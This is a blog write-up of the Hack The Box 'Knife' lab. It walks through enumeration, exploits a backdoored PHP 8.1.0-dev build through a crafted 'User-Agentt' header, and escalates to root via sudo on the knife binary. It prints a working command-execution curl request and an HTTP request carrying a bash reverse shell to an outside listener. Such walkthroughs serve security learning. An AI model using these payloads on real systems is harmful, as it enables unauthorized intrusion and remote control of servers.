• Donald Ashdown

Hack the box - Knife

Updated: Apr 20



Summary

Knife is an extremely easy box that really shows the range of difficulties which can be within the "easy" band of Hack the box difficulties. This box catered to beginners and the experienced as you could simply copy and paste CVE scripts for your initial foothold, or try custom crafting the syntax yourself to make the exploit work for your initial foothold.


Tools used
  • Autorecon

  • Linpeas

  • Whatweb


Processes/Techniques
  • Webshell hijacking

  • Command injection to code execution

  • Linpeas privilege's enumeration

  • SETUID

References


Enumeration

As usual we start off with a basic Nmap scan to see what we are working with, and initially our attack vector looks fairly narrow. As a result we will do a second stage scan to enumerate version information, with assistance from the nmap .NSE engine by using the following flags.


-sC - use default enumeration scripts

-sV - version enumeration



Our more in-depth nmap scan shows the expected ssh service followed by our HTTP website that is identified with the title "Emergent Medical Idea", this is fantastic information.

I noticed that port 1839 did not show up on the in-depth scan


Using a targeted scan by specifying port '1839' while calling the flag -Pn to disable the ICMP flag incase our firewall has a threshold trigger, that when combined with the nmap scripting engine, creates to much traffic. This however is not the case, and we do not get any further information.


Enumeration AutoRecon

As always, I like to start AutoRecon in the background after my initial enumeration to pickup any bits and pieces I may of left behind. This can sometimes take up to 30 minutes so we will check back later.


Enumeration HTTP

Upon browsing to port 80 we can see that this website is likely attributed to the medical field.


Directory Buster

I start off with running a directory buster in the background to look for any hidden directories while I invest time actively enumerating this website. But unfortunately hidden directory results in nothing.


I was not able to click any of the sub menus in the upper right corner which was quite weird and suggestive that perhaps the page was still under development.


Page inspection

I proceeded to check the page contents and other than some basic scripts and formatting there was nothing interesting.


Auto Recon

Let's check back on AutoRecon and see if anything was picked up over port 80 that I perhaps missed with only a surface level scan.

Browsing into the AutoRecon scans directory shows us many reports that we can view and we will go straight to the whatweb results. If you don't already know, whatweb is a very powerful tool for website enumeration. The results are listed below.


WhatWeb report for http://10.129.216.29:80
Status    : 200 OK
Title     : Emergent Medical Idea
IP        : 10.129.216.29
Country   : RESERVED, ZZ

Summary   : PHP[8.1.0-dev], Apache[2.4.41], X-Powered-By[PHP/8.1.0-dev], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], Script

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 

        Version      : 2.4.41 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Ubuntu Linux
        String       : Apache/2.4.41 (Ubuntu) (from server string)

[ PHP ]
        PHP is a widely-used general-purpose scripting language 
        that is especially suited for Web development and can be 
        embedded into HTML. This plugin identifies PHP errors, 
        modules and versions and extracts the local file path and 
        username if present. 

        Version      : 8.1.0-dev
        Google Dorks: (2)
        Website     : http://www.php.net/

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 


[ X-Powered-By ]
        X-Powered-By HTTP header 

        String       : PHP/8.1.0-dev (from x-powered-by string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Wed, 15 Sep 2021 01:58:40 GMT
        Server: Apache/2.4.41 (Ubuntu)
        X-Powered-By: PHP/8.1.0-dev
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 2406
        Connection: close
        Content-Type: text/html; charset=UTF-8


Reviewing the output shows us that PHP is used in the development of the website and in particular version 8.1.0-dev. So lets take a look at this as I believe it is an older version we see here.


Enumeration - PHP version 8.1.0-dev

I came across a popular exploit that was found on exploit DB. This is not straight forward and involves researching the exploit and tampering around with the user agent field.


PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution


Here we enumerate through exploit DB and the packet storm exploits and after trying to manually execute system commands through the user agent we resort to trying the curl command.


CVE - Exploit DB -

https://www.exploit-db.com/exploits/49933


CVE - PacketStorm

https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html


Code injection - curl

Eventually we solve this with the curl command.

curl -i -H "User-Agentt: zerodiumsystem('id');" http://10.129.225.112/AAAA.php


Backdoor - Burpsuite

We also solve this by tinkering around with the syntax in burpsuite. Which eventually works and provide the callback to our listener.


GET /aaa.php HTTP/1.1
Host: 10.129.225.112
Upgrade-Insecure-Requests: 1
User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.44/6363 0>&1'");
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


Our netcat listener catches the reverse shell.



Root

I am largely in the habit of uploading privilege enumeration scripts such as linpeas however I always check for low hanging fruit in the users directory. Running a "sudo -l" command we actually see a result which is likely the path to root.


Sudo -l



Knife enumeration and GTFO bins

After tampering around with the knife binary, and failing to inject code, abuse the symbolic link, I eventually looked it up on GTFO bins where I found sudo abuse and we made our way to root.


https://gtfobins.github.io/gtfobins/knife/


Root

8 views0 comments